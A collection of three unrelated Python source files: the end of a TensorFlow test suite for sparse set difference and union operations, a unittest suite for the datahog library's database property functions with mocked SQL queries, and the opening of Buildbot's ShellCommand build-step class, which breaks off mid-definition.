# a - b.
expected_indices = [[1, 0], [1, 1], [2, 0], [2, 1], [2, 2], [3, 0], [3, 1]]
expected_values = _values([5, 9, 3, 4, 5, 1, 5], dtype)
expected_shape = [4, 3]
expected_counts = [0, 2, 3, 2]
difference = self._set_difference(sp_a, sp_b, True)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_difference_count(sp_a, sp_b, True))
# b - a.
expected_indices = [[1, 0], [2, 0], [2, 1]]
expected_values = _values([2, 1, 2], dtype)
expected_shape = [4, 2]
expected_counts = [0, 1, 2, 0]
difference = self._set_difference(sp_a, sp_b, False)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_difference_count(sp_a, sp_b, False))
def test_set_difference_duplicates_2d(self):
for dtype in _DTYPES:
self._test_set_difference_duplicates_2d(dtype)
def _test_set_difference_duplicates_2d(self, dtype):
a_values = [[1, 1, 3]]
b_values = [[1, 2, 2]]
# a - b.
expected_indices = [[0, 0]]
expected_values = _values([3], dtype)
expected_shape = [1, 1]
expected_counts = [1]
# Dense to sparse.
a = _constant(a_values, dtype=dtype)
sp_b = _dense_to_sparse(b_values, dtype=dtype)
difference = self._set_difference(a, sp_b, True)
self._assert_set_operation(
expected_indices, expected_values, expected_shape, difference,
dtype=dtype)
self.assertAllEqual(
expected_counts, self._set_difference_count(a, sp_b, True))
# Sparse to sparse.
sp_a = _dense_to_sparse(a_values, dtype=dtype)
difference = self._set_difference(sp_a, sp_b, True)
self._assert_set_operation(
expected_indices, expected_values, expected_shape, difference,
dtype=dtype)
self.assertAllEqual(
expected_counts, self._set_difference_count(a, sp_b, True))
# b - a.
expected_indices = [[0, 0]]
expected_values = _values([2], dtype)
expected_shape = [1, 1]
expected_counts = [1]
# Dense to sparse.
difference = self._set_difference(a, sp_b, False)
self._assert_set_operation(
expected_indices, expected_values, expected_shape, difference,
dtype=dtype)
self.assertAllEqual(
expected_counts, self._set_difference_count(a, sp_b, False))
# Sparse to sparse.
difference = self._set_difference(sp_a, sp_b, False)
self._assert_set_operation(
expected_indices, expected_values, expected_shape, difference,
dtype=dtype)
self.assertAllEqual(
expected_counts, self._set_difference_count(a, sp_b, False))
def test_sparse_set_difference_3d(self):
for dtype in _DTYPES:
self._test_sparse_set_difference_3d(dtype)
def test_sparse_set_difference_3d_invalid_indices(self):
for dtype in _DTYPES:
self._test_sparse_set_difference_3d(dtype, invalid_indices=True)
def _test_sparse_set_difference_3d(self, dtype, invalid_indices=False):
if invalid_indices:
indices = tf.constant([
[0, 1, 0], [0, 1, 1], # 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], [1, 1, 2], # 1,1
[0, 0, 0], [0, 0, 2], # 0,0
# 2,0
[2, 1, 1] # 2,1
# 3,*
], tf.int64)
else:
indices = tf.constant([
[0, 0, 0], [0, 0, 2], # 0,0
[0, 1, 0], [0, 1, 1], # 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], [1, 1, 2], # 1,1
# 2,0
[2, 1, 1] # 2,1
# 3,*
], tf.int64)
sp_a = tf.SparseTensor(
indices,
_constant([
1, 9, # 0,0
3, 3, # 0,1
1, # 1,0
9, 7, 8, # 1,1
# 2,0
5 # 2,1
# 3,*
], dtype),
tf.constant([4, 2, 3], tf.int64))
sp_b = tf.SparseTensor(
tf.constant([
[0, 0, 0], [0, 0, 3], # 0,0
# 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], # 1,1
[2, 0, 1], # 2,0
[2, 1, 1], # 2,1
[3, 0, 0], # 3,0
[3, 1, 0] # 3,1
], tf.int64),
_constant([
1, 3, # 0,0
# 0,1
3, # 1,0
7, 8, # 1,1
2, # 2,0
5, # 2,1
4, # 3,0
4 # 3,1
], dtype),
tf.constant([4, 2, 4], tf.int64))
if invalid_indices:
with self.assertRaisesRegexp(tf.OpError, "out of order"):
self._set_difference(sp_a, sp_b, False)
with self.assertRaisesRegexp(tf.OpError, "out of order"):
self._set_difference(sp_a, sp_b, True)
else:
# a-b
expected_indices = [
[0, 0, 0], # 0,0
[0, 1, 0], # 0,1
[1, 0, 0], # 1,0
[1, 1, 0], # 1,1
# 2,*
# 3,*
]
expected_values = _values([
9, # 0,0
3, # 0,1
1, # 1,0
9, # 1,1
# 2,*
# 3,*
], dtype)
expected_shape = [4, 2, 1]
expected_counts = [[
1, # 0,0
1 # 0,1
], [
1, # 1,0
1 # 1,1
], [
0, # 2,0
0 # 2,1
], [
0, # 3,0
0 # 3,1
]]
difference = self._set_difference(sp_a, sp_b, True)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(
expected_counts, self._set_difference_count(sp_a, sp_b))
# b-a
expected_indices = [
[0, 0, 0], # 0,0
# 0,1
[1, 0, 0], # 1,0
# 1,1
[2, 0, 0], # 2,0
# 2,1
[3, 0, 0], # 3,0
[3, 1, 0] # 3,1
]
expected_values = _values([
3, # 0,0
# 0,1
3, # 1,0
# 1,1
2, # 2,0
# 2,1
4, # 3,0
4, # 3,1
], dtype)
expected_shape = [4, 2, 1]
expected_counts = [[
1, # 0,0
0 # 0,1
], [
1, # 1,0
0 # 1,1
], [
1, # 2,0
0 # 2,1
], [
1, # 3,0
1 # 3,1
]]
difference = self._set_difference(sp_a, sp_b, False)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_difference_count(sp_a, sp_b, False))
def _set_difference(self, a, b, aminusb=True):
# Validate that we get the same results with or without `validate_indices`.
ops = [
tf.contrib.metrics.set_difference(
a, b, aminusb=aminusb, validate_indices=True),
tf.contrib.metrics.set_difference(
a, b, aminusb=aminusb, validate_indices=False)
]
with self.test_session() as sess:
results = sess.run(ops)
self.assertAllEqual(results[0].indices, results[1].indices)
self.assertAllEqual(results[0].values, results[1].values)
self.assertAllEqual(results[0].shape, results[1].shape)
return results[0]
def _set_difference_count(self, a, b, aminusb=True):
op = tf.contrib.metrics.set_size(
tf.contrib.metrics.set_difference(a, b, aminusb))
with self.test_session() as sess:
return sess.run(op)
def test_set_union_multirow_2d(self):
for dtype in _DTYPES:
self._test_set_union_multirow_2d(dtype)
def _test_set_union_multirow_2d(self, dtype):
a_values = [[9, 1, 5], [2, 4, 3]]
b_values = [[1, 9], [1]]
expected_indices = [[0, 0], [0, 1], [0, 2], [1, 0], [1, 1], [1, 2], [1, 3]]
expected_values = _values([1, 5, 9, 1, 2, 3, 4], dtype)
expected_shape = [2, 4]
expected_counts = [3, 4]
# Dense to sparse.
a = _constant(a_values, dtype=dtype)
sp_b = _dense_to_sparse(b_values, dtype=dtype)
union = self._set_union(a, sp_b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, union, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_union_count(a, sp_b))
# Sparse to sparse.
sp_a = _dense_to_sparse(a_values, dtype=dtype)
union = self._set_union(sp_a, sp_b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, union, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_union_count(sp_a, sp_b))
def test_dense_set_union_multirow_2d(self):
for dtype in _DTYPES:
self._test_dense_set_union_multirow_2d(dtype)
def _test_dense_set_union_multirow_2d(self, dtype):
a_values = [[9, 1, 5], [2, 4, 3]]
b_values = [[1, 9], [1, 2]]
expected_indices = [[0, 0], [0, 1], [0, 2], [1, 0], [1, 1], [1, 2], [1, 3]]
expected_values = _values([1, 5, 9, 1, 2, 3, 4], dtype)
expected_shape = [2, 4]
expected_counts = [3, 4]
# Dense to dense.
a = _constant(a_values, dtype=dtype)
b = _constant(b_values, dtype=dtype)
union = self._set_union(a, b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, union, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_union_count(a, b))
def test_set_union_duplicates_2d(self):
for dtype in _DTYPES:
self._test_set_union_duplicates_2d(dtype)
def _test_set_union_duplicates_2d(self, dtype):
a_values = [[1, 1, 3]]
b_values = [[1]]
expected_indices = [[0, 0], [0, 1]]
expected_values = _values([1, 3], dtype)
expected_shape = [1, 2]
# Dense to sparse.
a = _constant(a_values, dtype=dtype)
sp_b = _dense_to_sparse(b_values, dtype=dtype)
union = self._set_union(a, sp_b)
self._assert_set_operation(
expected_indices, expected_values, expected_shape, union, dtype=dtype)
self.assertAllEqual([2], self._set_union_count(a, sp_b))
# Sparse to sparse.
sp_a = _dense_to_sparse(a_values, dtype=dtype)
union = self._set_union(sp_a, sp_b)
self._assert_set_operation(
expected_indices, expected_values, expected_shape, union, dtype=dtype)
self.assertAllEqual([2], self._set_union_count(sp_a, sp_b))
def test_sparse_set_union_3d(self):
for dtype in _DTYPES:
self._test_sparse_set_union_3d(dtype)
def test_sparse_set_union_3d_invalid_indices(self):
for dtype in _DTYPES:
self._test_sparse_set_union_3d(dtype, invalid_indices=True)
def _test_sparse_set_union_3d(self, dtype, invalid_indices=False):
if invalid_indices:
indices = tf.constant([
[0, 1, 0], [0, 1, 1], # 0,1
[1, 0, 0], # 1,0
[0, 0, 0], [0, 0, 2], # 0,0
[1, 1, 0], [1, 1, 1], [1, 1, 2], # 1,1
# 2,0
[2, 1, 1] # 2,1
# 3,*
], tf.int64)
else:
indices = tf.constant([
[0, 0, 0], [0, 0, 2], # 0,0
[0, 1, 0], [0, 1, 1], # 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], [1, 1, 2], # 1,1
# 2,0
[2, 1, 1] # 2,1
# 3,*
], tf.int64)
sp_a = tf.SparseTensor(
indices,
_constant([
1, 9, # 0,0
3, 3, # 0,1
1, # 1,0
9, 7, 8, # 1,1
# 2,0
5 # 2,1
# 3,*
], dtype),
tf.constant([4, 2, 3], tf.int64))
sp_b = tf.SparseTensor(
tf.constant([
[0, 0, 0], [0, 0, 3], # 0,0
# 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], # 1,1
[2, 0, 1], # 2,0
[2, 1, 1], # 2,1
[3, 0, 0], # 3,0
[3, 1, 0] # 3,1
], tf.int64),
_constant([
1, 3, # 0,0
# 0,1
3, # 1,0
7, 8, # 1,1
2, # 2,0
5, # 2,1
4, # 3,0
4 # 3,1
], dtype),
tf.constant([4, 2, 4], tf.int64))
if invalid_indices:
with self.assertRaisesRegexp(tf.OpError, "out of order"):
self._set_union(sp_a, sp_b)
else:
expected_indices = [
[0, 0, 0], [0, 0, 1], [0, 0, 2], # 0,0
[0, 1, 0], # 0,1
[1, 0, 0], [1, 0, 1], # 1,0
[1, 1, 0], [1, 1, 1], [1, 1, 2], # 1,1
[2, 0, 0], # 2,0
[2, 1, 0], # 2,1
[3, 0, 0], # 3,0
[3, 1, 0], # 3,1
]
expected_values = _values([
1, 3, 9, # 0,0
3, # 0,1
1, 3, # 1,0
7, 8, 9, # 1,1
2, # 2,0
5, # 2,1
4, # 3,0
4, # 3,1
], dtype)
expected_shape = [4, 2, 3]
expected_counts = [[
3, # 0,0
1 # 0,1
], [
2, # 1,0
3 # 1,1
], [
1, # 2,0
1 # 2,1
], [
1, # 3,0
1 # 3,1
]]
intersection = self._set_union(sp_a, sp_b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_union_count(sp_a, sp_b))
def _set_union(self, a, b):
# Validate that we get the same results with or without `validate_indices`.
ops = [
tf.contrib.metrics.set_union(a, b, validate_indices=True),
tf.contrib.metrics.set_union(a, b, validate_indices=False)
]
with self.test_session() as sess:
results = sess.run(ops)
self.assertAllEqual(results[0].indices, results[1].indices)
self.assertAllEqual(results[0].values, results[1].values)
self.assertAllEqual(results[0].shape, results[1].shape)
return results[0]
def _set_union_count(self, a, b):
op = tf.contrib.metrics.set_size(tf.contrib.metrics.set_union(a, b))
with self.test_session() as sess:
return sess.run(op)
def _assert_set_operation(self, expected_indices, expected_values,
expected_shape, sparse_tensor, dtype):
self.assertAllEqual(expected_indices, sparse_tensor.indices)
self.assertAllEqual(len(expected_indices), len(expected_values))
self.assertAllEqual(len(expected_values), len(sparse_tensor.values))
expected_set = set()
actual_set = set()
last_indices = None
for indices, expected_value, actual_value in zip(
expected_indices, expected_values, sparse_tensor.values):
if dtype == tf.string:
actual_value = actual_value.decode("utf-8")
if last_indices and (last_indices[:-1] != indices[:-1]):
self.assertEqual(
expected_set, actual_set, "Expected %s, got %s, at %s." % (
expected_set, actual_set, indices))
expected_set.clear()
actual_set.clear()
expected_set.add(expected_value)
actual_set.add(actual_value)
last_indices = indices
self.assertEqual(
expected_set, actual_set, "Expected %s, got %s, at %s." % (
expected_set, actual_set, last_indices))
self.assertAllEqual(expected_shape, sparse_tensor.shape)
if __name__ == "__main__":
googletest.main()
| |
# vim: fileencoding=utf8:et:sw=4:ts=8:sts=4
import os
import sys
import unittest
import datahog
from datahog.const import util
from datahog import error
import mummy
import psycopg2
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
import base
from pgmock import *
class PropertyTests(base.TestCase):
def setUp(self):
super(PropertyTests, self).setUp()
datahog.set_context(1, datahog.NODE)
datahog.set_context(2, datahog.PROPERTY,
{'base_ctx': 1, 'storage': datahog.storage.INT})
def test_set_insert(self):
add_fetch_result([(True, False)])
self.assertEqual(
datahog.prop.set(self.p, 1234, 2, 10),
(True, False))
self.assertEqual(eventlog, [
GET_CURSOR,
EXECUTE("""
with existencequery as (
select 1
from node
where
time_removed is null
and id=%s
and ctx=%s
),
updatequery as (
update property
set num=%s, value=null
where
time_removed is null
and base_id=%s
and ctx=%s
and exists (select 1 from existencequery)
returning 1
),
insertquery as (
insert into property (base_id, ctx, num, flags)
select %s, %s, %s, %s
where
not exists (select 1 from updatequery)
and exists (select 1 from existencequery)
returning 1
)
select
exists (select 1 from insertquery),
exists (select 1 from updatequery)
""", (1234, 1, 10, 1234, 2, 1234, 2, 10, 0)),
FETCH_ONE,
COMMIT])
def test_set_update(self):
add_fetch_result([(False, True)])
self.assertEqual(
datahog.prop.set(self.p, 1234, 2, 10),
(False, True))
self.assertEqual(eventlog, [
GET_CURSOR,
EXECUTE("""
with existencequery as (
select 1
from node
where
time_removed is null
and id=%s
and ctx=%s
),
updatequery as (
update property
set num=%s, value=null
where
time_removed is null
and base_id=%s
and ctx=%s
and exists (select 1 from existencequery)
returning 1
),
insertquery as (
insert into property (base_id, ctx, num, flags)
select %s, %s, %s, %s
where
not exists (select 1 from updatequery)
and exists (select 1 from existencequery)
returning 1
)
select
exists (select 1 from insertquery),
exists (select 1 from updatequery)
""", (1234, 1, 10, 1234, 2, 1234, 2, 10, 0)),
FETCH_ONE,
COMMIT])
def test_set_fail_no_obj(self):
add_fetch_result([(False, False)])
self.assertRaises(error.NoObject,
datahog.prop.set, self.p, 1234, 2, 10)
self.assertEqual(eventlog, [
GET_CURSOR,
EXECUTE("""
with existencequery as (
select 1
from node
where
time_removed is null
and id=%s
and ctx=%s
),
updatequery as (
update property
set num=%s, value=null
where
time_removed is null
and base_id=%s
and ctx=%s
and exists (select 1 from existencequery)
returning 1
),
insertquery as (
insert into property (base_id, ctx, num, flags)
select %s, %s, %s, %s
where
not exists (select 1 from updatequery)
and exists (select 1 from existencequery)
returning 1
)
select
exists (select 1 from insertquery),
exists (select 1 from updatequery)
""", (1234, 1, 10, 1234, 2, 1234, 2, 10, 0)),
FETCH_ONE,
COMMIT])
def test_set_race_cond_backup(self):
def initial_failure():
query_fail(None)
return psycopg2.IntegrityError()
query_fail(initial_failure)
add_fetch_result([()])
self.assertEqual(
datahog.prop.set(self.p, 1234, 2, 10),
(False, True))
self.assertEqual(eventlog, [
GET_CURSOR,
EXECUTE_FAILURE("""
with existencequery as (
select 1
from node
where
time_removed is null
and id=%s
and ctx=%s
),
updatequery as (
update property
set num=%s, value=null
where
time_removed is null
and base_id=%s
and ctx=%s
and exists (select 1 from existencequery)
returning 1
),
insertquery as (
insert into property (base_id, ctx, num, flags)
select %s, %s, %s, %s
where
not exists (select 1 from updatequery)
and exists (select 1 from existencequery)
returning 1
)
select
exists (select 1 from insertquery),
exists (select 1 from updatequery)
""", (1234, 1, 10, 1234, 2, 1234, 2, 10, 0)),
ROLLBACK,
EXECUTE("""
update property
set num=%s, value=%s
where
time_removed is null
and base_id=%s
and ctx=%s
""", (10, None, 1234, 2)),
ROWCOUNT,
COMMIT])
def test_get_success(self):
add_fetch_result([(15, 0)])
self.assertEqual(
datahog.prop.get(self.p, 1234, 2),
{'base_id': 1234, 'ctx': 2, 'flags': set([]), 'value': 15})
self.assertEqual(eventlog, [
GET_CURSOR,
EXECUTE("""
select num, flags
from property
where
time_removed is null
and base_id=%s
and ctx=%s
""", (1234, 2)),
ROWCOUNT,
FETCH_ONE,
COMMIT])
def test_get_failure(self):
add_fetch_result([])
self.assertEqual(
datahog.prop.get(self.p, 1234, 2),
None)
self.assertEqual(eventlog, [
GET_CURSOR,
EXECUTE("""
select num, flags
from property
where
time_removed is null
and base_id=%s
and ctx=%s
""", (1234, 2)),
ROWCOUNT,
COMMIT])
def test_get_list_list(self):
datahog.set_context(3, datahog.PROPERTY, {
'base_ctx': 1, 'storage': datahog.storage.STR})
datahog.set_context(4, datahog.PROPERTY, {
'base_ctx': 1, 'storage': datahog.storage.STR})
datahog.set_flag(1, 4)
datahog.set_flag(2, 4)
datahog.set_flag(3, 4)
add_fetch_result([
(2, 10, None, 0),
(4, None, "foobar", 5)])
self.assertEqual(
datahog.prop.get_list(self.p, 123, [2, 3, 4]),
[
{'base_id': 123, 'ctx': 2, 'flags': set([]), 'value': 10},
None,
{'base_id': 123, 'ctx': 4, 'flags': set([1, 3]),
'value': 'foobar'}
])
self.assertEqual(eventlog, [
GET_CURSOR,
EXECUTE("""
select ctx, num, value, flags
from property
where
time_removed is null
and base_id=%s
and ctx in (%s, %s, %s)
""", (123, 2, 3, 4)),
FETCH_ALL,
COMMIT])
def test_get_list_all(self):
datahog.set_context(3, datahog.PROPERTY, {
'base_ctx': 1, 'storage': datahog.storage.STR})
datahog.set_context(4, datahog.PROPERTY, {
'base_ctx': 1, 'storage': datahog.storage.STR})
datahog.set_flag(1, 4)
datahog.set_flag(2, 4)
datahog.set_flag(3, 4)
add_fetch_result([
(2, 10, None, 0),
(4, None, "foobar", 5)])
self.assertEqual(
sorted(datahog.prop.get_list(self.p, 123),
key=lambda d: d['ctx']),
[
{'base_id': 123, 'ctx': 2, 'flags': set([]), 'value': 10},
{'base_id': 123, 'ctx': 4, 'flags': set([1, 3]),
'value': 'foobar'}
])
self.assertEqual(eventlog, [
GET_CURSOR,
EXECUTE("""
select ctx, num, value, flags
from property
where
time_removed is null
and base_id=%s
""", (123,)),
FETCH_ALL,
COMMIT])
def test_increment(self):
add_fetch_result([(10,)])
self.assertEqual(
datahog.prop.increment(self.p, 123, 2),
10)
self.assertEqual(eventlog, [
GET_CURSOR,
EXECUTE("""
update property
set num=num+%s
where
time_removed is null
and base_id=%s
and ctx=%s
returning num
""", (1, 123, 2)),
ROWCOUNT,
FETCH_ONE,
COMMIT])
def test_increment_limit_pos(self):
add_fetch_result([(20,)])
self.assertEqual(
datahog.prop.increment(self.p, 123, 2, 5, 20),
20)
self.assertEqual(eventlog, [
GET_CURSOR,
EXECUTE("""
update property
set num=case
when (num+%s < %s)
then num+%s
else %s
end
where
time_removed is null
and base_id=%s
and ctx=%s
returning num
""", (5, 20, 5, 20, 123, 2)),
ROWCOUNT,
FETCH_ONE,
COMMIT])
def test_increment_limit_neg(self):
add_fetch_result([(20,)])
self.assertEqual(
datahog.prop.increment(self.p, 123, 2, -5, 0),
20)
self.assertEqual(eventlog, [
GET_CURSOR,
EXECUTE("""
update property
set num=case
when (num+%s > %s)
then num+%s
else %s
end
where
time_removed is null
and base_id=%s
and ctx=%s
returning num
""", (-5, 0, -5, 0, 123, 2)),
ROWCOUNT,
FETCH_ONE,
COMMIT])
def test_add_flags(self):
datahog.set_flag(1, 2)
datahog.set_flag(2, 2)
datahog.set_flag(3, 2)
add_fetch_result([(7,)])
self.assertEqual(
datahog.prop.set_flags(self.p, 123, 2, [1, 3], []),
set([1, 2, 3]))
self.assertEqual(eventlog, [
GET_CURSOR,
EXECUTE("""
update property
set flags=flags | %s
where time_removed is null and ctx=%s and base_id=%s
returning flags
""", (5, 2, 123)),
FETCH_ALL,
COMMIT])
def test_add_flags_no_prop(self):
datahog.set_flag(1, 2)
datahog.set_flag(2, 2)
datahog.set_flag(3, 2)
add_fetch_result([])
self.assertEqual(
datahog.prop.set_flags(self.p, 123, 2, [1, 3], []),
None)
def test_clear_flags(self):
datahog.set_flag(1, 2)
datahog.set_flag(2, 2)
datahog.set_flag(3, 2)
add_fetch_result([(4,)])
self.assertEqual(
datahog.prop.set_flags(self.p, 123, 2, [], [1, 2]),
set([3]))
self.assertEqual(eventlog, [
GET_CURSOR,
EXECUTE("""
update property
set flags=flags & ~%s
where time_removed is null and ctx=%s and base_id=%s
returning flags
""", (3, 2, 123)),
FETCH_ALL,
COMMIT])
def test_clear_flags_no_prop(self):
datahog.set_flag(1, 2)
datahog.set_flag(2, 2)
datahog.set_flag(3, 2)
add_fetch_result([])
self.assertEqual(
datahog.prop.set_flags(self.p, 123, 2, [], [1, 3]),
None)
def test_set_flags_add(self):
datahog.set_flag(1, 2)
datahog.set_flag(2, 2)
datahog.set_flag(3, 2)
add_fetch_result([(5,)])
self.assertEqual(
datahog.prop.set_flags(self.p, 123, 2, [1, 3], []),
set([1, 3]))
self.assertEqual(eventlog, [
GET_CURSOR,
EXECUTE("""
update property
set flags=flags | %s
where
time_removed is null and ctx=%s and base_id=%s
returning flags
""", (5, 2, 123)),
FETCH_ALL,
COMMIT])
def test_set_flags_clear(self):
datahog.set_flag(1, 2)
datahog.set_flag(2, 2)
datahog.set_flag(3, 2)
add_fetch_result([(1,)])
self.assertEqual(
datahog.prop.set_flags(self.p, 123, 2, [], [2, 3]),
set([1]))
self.assertEqual(eventlog, [
GET_CURSOR,
EXECUTE("""
update property
set flags=flags & ~%s
where
time_removed is null and ctx=%s and base_id=%s
returning flags
""", (6, 2, 123)),
FETCH_ALL,
COMMIT])
def test_set_flags_both(self):
datahog.set_flag(1, 2)
datahog.set_flag(2, 2)
datahog.set_flag(3, 2)
add_fetch_result([(1,)])
self.assertEqual(
datahog.prop.set_flags(self.p, 123, 2, [1], [2, 3]),
set([1]))
self.assertEqual(eventlog, [
GET_CURSOR,
EXECUTE("""
update property
set flags=(flags & ~%s) | %s
where
time_removed is null and ctx=%s and base_id=%s
returning flags
""", (6, 1, 2, 123)),
FETCH_ALL,
COMMIT])
def test_set_flags_no_prop(self):
datahog.set_flag(1, 2)
datahog.set_flag(2, 2)
datahog.set_flag(3, 2)
add_fetch_result([])
self.assertEqual(
datahog.prop.set_flags(self.p, 123, 2, [1], [2, 3]),
None)
def test_remove_success(self):
add_fetch_result([None]) # just a rowcount
self.assertEqual(
datahog.prop.remove(self.p, 123, 2),
True)
self.assertEqual(eventlog, [
GET_CURSOR,
EXECUTE("""
update property
set time_removed=now()
where
time_removed is null
and base_id=%s
and ctx=%s
""", (123, 2)),
ROWCOUNT,
COMMIT])
def test_remove_failure(self):
add_fetch_result([])
self.assertEqual(
datahog.prop.remove(self.p, 123, 2),
False)
self.assertEqual(eventlog, [
GET_CURSOR,
EXECUTE("""
update property
set time_removed=now()
where
time_removed is null
and base_id=%s
and ctx=%s
""", (123, 2)),
ROWCOUNT,
COMMIT])
def test_remove_assert_val(self):
add_fetch_result([None])
self.assertEqual(
datahog.prop.remove(self.p, 123, 2, 15),
True)
self.assertEqual(eventlog, [
GET_CURSOR,
EXECUTE("""
update property
set time_removed=now()
where
time_removed is null
and base_id=%s
and ctx=%s
and num=%s
""", (123, 2, 15)),
ROWCOUNT,
COMMIT])
def test_storage_null(self):
datahog.set_context(3, datahog.PROPERTY, {
'base_ctx': 1, 'storage': datahog.storage.NULL
})
self.assertRaises(error.StorageClassError, util.storage_wrap, 3, 0)
self.assertEqual(util.storage_wrap(3, None), None)
self.assertEqual(util.storage_unwrap(3, None), None)
def test_storage_str(self):
datahog.set_context(4, datahog.PROPERTY, {
'base_ctx': 1, 'storage': datahog.storage.STR
})
self.assertRaises(error.StorageClassError, util.storage_wrap, 4, u'x')
self.assertEqual(
util.storage_wrap(4, 'test').adapted,
'test')
self.assertEqual(
util.storage_unwrap(4, psycopg2.Binary('testing')),
'testing')
def test_storage_utf(self):
datahog.set_context(5, datahog.PROPERTY, {
'base_ctx': 1, 'storage': datahog.storage.UTF
})
self.assertRaises(error.StorageClassError, util.storage_wrap, 5, 'no')
self.assertEqual(
util.storage_wrap(5, u'testing').adapted,
u'testing'.encode('utf8'))
self.assertEqual(
util.storage_unwrap(5, psycopg2.Binary('testing')),
u'testing')
def test_storage_serial(self):
datahog.set_context(6, datahog.PROPERTY, {
'base_ctx': 1, 'storage': datahog.storage.SERIAL,
})
self.assertEqual(
util.storage_wrap(6, ['test', 'path', {10: 0.1}]).adapted,
mummy.dumps(['test', 'path', {10: 0.1}]))
self.assertEqual(
util.storage_unwrap(6, psycopg2.Binary('\x10\x03\x08\x04test\x08\x04path\x13\x01\x02\n\x07?\xb9\x99\x99\x99\x99\x99\x9a')),
['test', 'path', {10: 0.1}])
if __name__ == '__main__':
unittest.main()
| |
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
import re
import inspect
from twisted.python import log, failure
from twisted.spread import pb
from twisted.python.deprecate import deprecatedModuleAttribute
from twisted.python.versions import Version
from buildbot.process import buildstep
from buildbot.status.results import SUCCESS, WARNINGS, FAILURE
from buildbot.status.logfile import STDOUT, STDERR
from buildbot import config
# for existing configurations that import WithProperties from here. We like
# to move this class around just to keep our readers guessing.
from buildbot.process.properties import WithProperties
_hush_pyflakes = [WithProperties]
del _hush_pyflakes
class ShellCommand(buildstep.LoggingBuildStep):
"""I run a single shell command on the buildslave. I return FAILURE if
the exit code of that command is non-zero, SUCCESS otherwise. To change
this behavior, override my .evaluateCommand method, or customize
decodeRC argument
By default, a failure of this step will mark the whole build as FAILURE.
To override this, give me an argument of flunkOnFailure=False .
I create a single Log named 'log' which contains the output of the
command. To create additional summary Logs, override my .createSummary
method.
The shell command I run (a list of argv strings) can be provided in
several ways:
- a class-level .command attribute
- a command= parameter to my constructor (overrides .command)
- set explicitly with my .setCommand() method (overrides both)
@ivar command: a list of renderable objects (typically strings or
WithProperties instances). This will be used by start()
to create a RemoteShellCommand instance.
@ivar logfiles: a dict mapping log NAMEs to workdir-relative FILENAMEs
of their corresponding logfiles. The contents of the file
named FILENAME will be put into a LogFile named NAME, ina
something approximating real-time. (note that logfiles=
is actually handled by our parent class LoggingBuildStep)
@ivar lazylogfiles: Defaults to False. If True, logfiles will be tracked
`lazily', meaning they will only be added when and if
they are written to. Empty or nonexistent logfiles
will be omitted. (Also handled by class
LoggingBuildStep.)
"""
name = "shell"
renderables = buildstep.LoggingBuildStep.renderables + [
'slaveEnvironment', 'remote_kwargs', 'command',
'description', 'descriptionDone', 'descriptionSuffix']
description = None # set this to a list of short strings to override
descriptionDone = None # alternate description when the step is complete
descriptionSuffix = None # extra information to append to suffix
command = None # set this to a command, or set in kwargs
# logfiles={} # you can also set 'logfiles' to a dictionary, and it
# will be merged with any logfiles= argument passed in
# to __init__
# override this on a specific ShellCommand if you want to let it fail
# without dooming the entire build to a status of FAILURE
flunkOnFailure = True
def __init__(self, workdir=None,
description=None, descriptionDone=None, descriptionSuffix=None,
command=None,
usePTY="slave-config",
**kwargs):
# most of our arguments get passed through to the RemoteShellCommand
# that we create, but first strip out the ones that we pass to
# BuildStep (like haltOnFailure and friends), and a couple that we
# consume ourselves.
if description:
self.description = description
if isinstance(self.description, str):
self.description = [self.description]
if descriptionDone:
self.descriptionDone = descriptionDone
if isinstance(self.descriptionDone, str):
self.descriptionDone = [self.descriptionDone]
if descriptionSuffix:
self.descriptionSuffix = descriptionSuffix
if isinstance(self.descriptionSuffix, str):
self.descriptionSuffix = [self.descriptionSuffix]
if command:
self.setCommand(command)
# pull out the ones that LoggingBuildStep wants, then upcall
buildstep_kwargs = {}
for k in kwargs.keys()[:]:
if k in self.__class__.parms:
buildstep_kwargs[k] = kwargs[k]
del kwargs[k]
buildstep.LoggingBuildStep.__init__(self, **buildstep_kwargs)
# check validity of arguments being passed to RemoteShellCommand
invalid_args = []
valid_rsc_args = inspect.getargspec(buildstep.RemoteShellCommand.__init__)[0]
for arg in kwargs.keys():
if arg not in valid_rsc_args:
invalid_args.append(arg)
# Raise Configuration error in case invalid arguments are present
if invalid_args:
config.error("Invalid argument(s) passed to RemoteShellCommand: "
+ ', '.join(invalid_args))
# everything left over goes to the RemoteShellCommand
kwargs['workdir'] = workdir # including a copy of 'workdir'
kwargs['usePTY'] = usePTY
self.remote_kwargs = kwargs
def setBuild(self, build):
buildstep.LoggingBuildStep.setBuild(self, build)
# Set this here, so it gets rendered when we start the step
self.slaveEnvironment = self.build.slaveEnvironment
def setStepStatus(self, step_status):
buildstep.LoggingBuildStep.setStepStatus(self, step_status)
def setDefaultWorkdir(self, workdir):
rkw = self.remote_kwargs
rkw['workdir'] = rkw['workdir'] or workdir
def getWorkdir(self):
